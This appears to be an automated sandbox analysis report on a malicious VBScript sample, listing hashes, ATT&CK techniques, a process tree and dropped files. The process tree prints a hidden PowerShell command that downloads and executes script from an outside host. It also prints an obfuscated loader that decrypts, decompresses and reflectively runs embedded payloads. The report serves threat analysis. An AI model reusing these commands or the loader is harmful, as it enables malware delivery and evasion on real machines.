f24da1d458f078adf96dca79955313eea5cfe7a6a36334b1352553a31928cec6

General

Target

f24da1d458f078adf96dca79955313eea5cfe7a6a36334b1352553a31928cec6.vbs
Size

78KB
MD5

ab631b79a8f6cc0f48e17765c33c8fee
SHA1

539298c574b25b70379fccd8c47c3dbee5184877
SHA256

f24da1d458f078adf96dca79955313eea5cfe7a6a36334b1352553a31928cec6
SHA512

0e5818d2c4eca342c7b8ece7c8f14028e34d00e2c83f0d3c72ceaeb0380fc568ceb02df8e5743b9a691d85cc462863bceb68ccb1cf499994fe0e523debe6e550
SSDEEP

1536:rtYq5Mv5eaBf+kvAQKCidRC0Xe6Tw/LP5KU52t+gN4:lmRea3vAWGOyZsu4

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2328	powershell.exe
2052	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2328	powershell.exe
2052	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeDebugPrivilege	2052	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2532 wrote to memory of 2328	2532	WScript.exe	29
PID 2532 wrote to memory of 2328	2532	WScript.exe	29
PID 2532 wrote to memory of 2328	2532	WScript.exe	29
PID 2532 wrote to memory of 2276	2532	WScript.exe	31
PID 2532 wrote to memory of 2276	2532	WScript.exe	31
PID 2532 wrote to memory of 2276	2532	WScript.exe	31
PID 2276 wrote to memory of 2248	2276	cmd.exe	33
PID 2276 wrote to memory of 2248	2276	cmd.exe	33
PID 2276 wrote to memory of 2248	2276	cmd.exe	33
PID 2276 wrote to memory of 2052	2276	cmd.exe	34
PID 2276 wrote to memory of 2052	2276	cmd.exe	34
PID 2276 wrote to memory of 2052	2276	cmd.exe	34

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f24da1d458f078adf96dca79955313eea5cfe7a6a36334b1352553a31928cec6.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2328
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xZeq9DIcMp8T9I70bsZRE1uAqlMKnnwxo9STrCb0BJQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wSiqGPKdEt2A2oq502N0Dw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WbLZH=New-Object System.IO.MemoryStream(,$param_var); $YROuh=New-Object System.IO.MemoryStream; $FnRtc=New-Object System.IO.Compression.GZipStream($WbLZH, [IO.Compression.CompressionMode]::Decompress); $FnRtc.CopyTo($YROuh); $FnRtc.Dispose(); $WbLZH.Dispose(); $YROuh.Dispose(); $YROuh.ToArray();}function execute_function($param_var,$param2_var){ $JFUbC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vIQTp=$JFUbC.EntryPoint; $vIQTp.Invoke($null, $param2_var);}$LMlhd = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $LMlhd;$qwcXI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($LMlhd).Split([Environment]::NewLine);foreach ($RYDhX in $qwcXI) { if ($RYDhX.StartsWith('qSryZxtgHRJoDBkXgCTa')) { $MiSte=$RYDhX.Substring(20); break; }}$payloads_var=[string[]]$MiSte.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:2248
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2052

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
69KB

MD5
9a7ec81cc371860d03b51764e8eade97

SHA1
3a22f9120587dc2fc84765efde70586fd0775fdf

SHA256
20a77dbb7b4438cc9cfa45e1a3de33b7100b039ca7f8838a12d09273f55dbe3e

SHA512
9d3a4c525b0f811ab9fb57787c16ce32dcba714fea558c5f3364703a20f232ece58a83c0edf3294a62d92ce52b3878f50f1c30ef6687d1e37e855f0f069331bb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
5389cdcca10f8bce168c14327d982edf

SHA1
29e996d8d76da7a967f3c5d3cd932d86cf8afb57

SHA256
0efded618b8d067f7f8332f7babcdcea2beb73d4d9b4c2f37f438934f5aa37f4

SHA512
fc7238020b5b99622216650d50bc7ff39302284c6cd5d392e2b07994657406689a01394ef430b737bb895399d435b3de7aa1d9146d53756d8b0183723566fb58

Download Submit
memory/2052-28-0x00000000023A0000-0x00000000023A8000-memory.dmp

Filesize
32KB

Download
memory/2052-27-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/2328-7-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

Filesize
9.6MB

Download
memory/2328-10-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

Filesize
9.6MB

Download
memory/2328-11-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

Filesize
9.6MB

Download
memory/2328-9-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

Filesize
9.6MB

Download
memory/2328-8-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

Filesize
9.6MB

Download
memory/2328-4-0x000007FEF57FE000-0x000007FEF57FF000-memory.dmp

Filesize
4KB

Download
memory/2328-6-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/2328-5-0x000000001B780000-0x000000001BA62000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing